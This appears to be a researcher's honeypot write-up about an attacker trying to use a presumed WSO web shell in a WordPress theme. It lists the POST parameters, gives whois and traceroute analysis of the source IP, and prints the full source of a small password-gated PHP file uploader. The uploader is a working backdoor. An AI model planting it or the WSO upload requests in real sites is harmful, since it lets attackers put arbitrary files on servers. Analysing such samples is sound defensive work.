Simple file uploader with strange whois
information.
At least one other analysis of this uploader appears on the web.
The attacker(s) seem to have believed they were accessing a WSO (Web Shell by oRb)
web shell.
The requested a URL ending in /wp-content/themes/twentytwelve/404.php
,
a common spot for "hidden" web shells and backdoors to reside.
The HTTP POST request came with parameters typical for WSO:
Name | Value |
---|---|
a | FilesMAn |
c | /var/www/html/wp-content/themes/twentytwelve/ |
p1 | uploadFile |
charset | Windows-1251 |
The "a" parameter even has the odd "FilesMAn" camel-case that appears in lots of WSO source.
The file was named "gan.php" on the attacker(s) machine.
This particular WSO access had a cookie that WSO accepted as meaning "previously logged in".
The attacker logged in with a password of "w" 29 seconds earlier.
This was probably a manual install, with a browser driver by a human user.
The IP address asked for favicon.ico
and the purported WSO URL
immediately before this download.
The downloader identified itself as "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0"
p0f3
identified the IP address as running "Windows 7 or 8", so the user agent string reconciles.
whois
says that it's a Cogent IP address, but the AfriNIC Whois server answers,
which is weird.
% This is the AfriNIC Whois server.
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
NetRange: 154.48.0.0 - 154.48.255.255
CIDR: 154.48.0.0/16
NetName: COGENT-154-48-16
NetHandle: NET-154-48-0-0-1
Parent: NET154 (NET-154-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS174
Organization: PSINet, Inc. (PSI-2)
RegDate: 1992-02-05
Updated: 2017-10-30
Ref: https://rdap.arin.net/registry/ip/154.48.0.0
traceroute
has a route from Denver, CO, US through cogentco.com addresses,
on to a set of NTT.com (Japanese telecom) IP addresses,
traceroute to 154.48.243.123 (154.48.243.123), 30 hops max, 60 byte packets
1 blahblah (612.624.54.912) 62.843 ms 62.827 ms 62.778 ms
2 10.100.100.2 (10.100.100.2) 62.755 ms 62.921 ms 62.694 ms
3 te0-0-1-1.nr11.b004491-1.den01.atlas.cogentco.com (38.122.238.45) 65.324 ms 65.302 ms 77.824 ms
4 te0-0-2-2.nr11.b006545-1.den01.atlas.cogentco.com (154.24.53.101) 87.984 ms 87.969 ms 87.925 ms
5 te0-0-1-2.agr14.den01.atlas.cogentco.com (154.24.17.121) 87.883 ms te0-0-2-1.agr12.den01.atlas.cogentco.com (154.24.13.53) 87.861 ms te0-0-1-2.agr13.den01.atlas.cogentco.com (154.24.17.117) 87.803 ms
6 te0-7-0-2.ccr22.den01.atlas.cogentco.com (154.54.30.229) 87.754 ms te0-7-0-11.ccr22.den01.atlas.cogentco.com (154.54.31.125) 40.248 ms te0-7-0-2.ccr22.den01.atlas.cogentco.com (154.54.30.229) 40.188 ms
7 be3035.ccr21.mci01.atlas.cogentco.com (154.54.5.90) 72.882 ms be3036.ccr22.mci01.atlas.cogentco.com (154.54.31.90) 72.841 ms be3035.ccr21.mci01.atlas.cogentco.com (154.54.5.90) 78.145 ms
8 be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213) 75.335 ms be2432.ccr31.dfw01.atlas.cogentco.com (154.54.3.133) 75.280 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213) 75.261 ms
9 be2764.ccr41.dfw03.atlas.cogentco.com (154.54.47.214) 89.879 ms 89.816 ms be2763.ccr41.dfw03.atlas.cogentco.com (154.54.28.74) 89.809 ms
10 ae-5.r10.dllstx09.us.bb.gin.ntt.net (129.250.9.205) 89.784 ms 89.743 ms 89.888 ms
11 ae-0.r23.dllstx09.us.bb.gin.ntt.net (129.250.5.5) 89.861 ms 89.835 ms 56.434 ms
12 ae-8.r23.snjsca04.us.bb.gin.ntt.net (129.250.4.154) 81.747 ms 81.469 ms 84.352 ms
13 ae-21.r30.tokyjp05.jp.bb.gin.ntt.net (129.250.5.77) 189.215 ms 189.151 ms 189.145 ms
14 ae-4.r24.tkokhk01.hk.bb.gin.ntt.net (129.250.2.51) 236.345 ms 295.354 ms 298.360 ms
15 ae-1.r03.tkokhk01.hk.bb.gin.ntt.net (129.250.6.98) 298.339 ms 298.282 ms 298.272 ms
16 ae-2.a01.newthk03.hk.bb.gin.ntt.net (129.250.6.125) 290.508 ms ae-1.a01.newthk03.hk.bb.gin.ntt.net (129.250.5.253) 290.493 ms ae-2.a01.newthk03.hk.bb.gin.ntt.net (129.250.6.125) 290.426 ms
17 xe-0-0-19-2-381.a01.newthk03.hk.ce.gin.ntt.net (192.80.17.90) 293.034 ms 267.935 ms 255.536 ms
18 * * *
19 * * *
20 154.48.243.123 (154.48.243.123) 222.118 ms 222.107 ms 217.720 ms
Notice the big jump in response times between ae-8.r23.snjsca04.us.bb.gin.ntt.net (129.250.4.154), and ae-21.r30.tokyjp05.jp.bb.gin.ntt.net (129.250.5.77). The great circle distance from San Jose to Tokyo is 5186 miles, so speed-of-light lag is only about 0.03 seconds, or 30 milliseconds. The next big jump in time is from ae-21.r30.tokyjp05.jp.bb.gin.ntt.net to ae-4.r24.tkokhk01.hk.bb.gin.ntt.net, which conveniently has "tkokhk01", "Tokyo to Hong Kong" probably, in its name.
ipaddres.is puts it on a penninsula on a lake near Hutchinson, KS, USA.
I don't think there's anything nefarious here, just that NTT isn't doing a great job of publicizing where its IP addresses live. I also think that Cogent has sold/leased a block of IP addresses to someplace in Hong Kong. The record keeping doesn't seem to have caught up.
This uploader protects itself by only functioning if a HTTP GET request
includes the string ?login=canshu
in the URL.
Even a pretty-printed version of this uploader is small enough to include directly:
=== WooCommerce ===
Contributors: automattic, mikejolley, jameskoster, claudiosanches, claudiulodro, kloon, rodrigosprimo, jshreve, coderkevin
Tags: ecommerce, e-commerce, store, sales, sell, shop, cart, checkout, downloadable, downloads, paypal, storefront, woo commerce
what times wordpress
<?php
if ($_GET["login"] == "canshu") {
if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Upload Complate !!!</b><br>';
}
echo '<form action="" method="post" enctype="multipart/form-data"><input type="file" name="file" size="50"><input type="submit" value="submit"/></form>';
}
This code has some weird aspects.
The PHP interpreter will print the small block of pure ASCII text just before the <?php
tag on every access.
At first, I thought this was a Google "dork", some chunk of text that Google would index,
and attacker(s) could find with a simple search.
As of 2019-03-02, this downloader does exist in some Russian-language web pages.
You can find it using the block of text.
But downloaders are not the most common thing you find using the block of text.
You get many more hits on plain Woo Commerce installs.
The block of text also appears in readme.txt
files in Woo Commerce plugin installs.
I don't know what to make of the inclusion of that chunk of text.
It also generates incomplete HTML: there's no <html>
or <body>
tags around
the HTML <form>
it outputs.
This is just shoddy.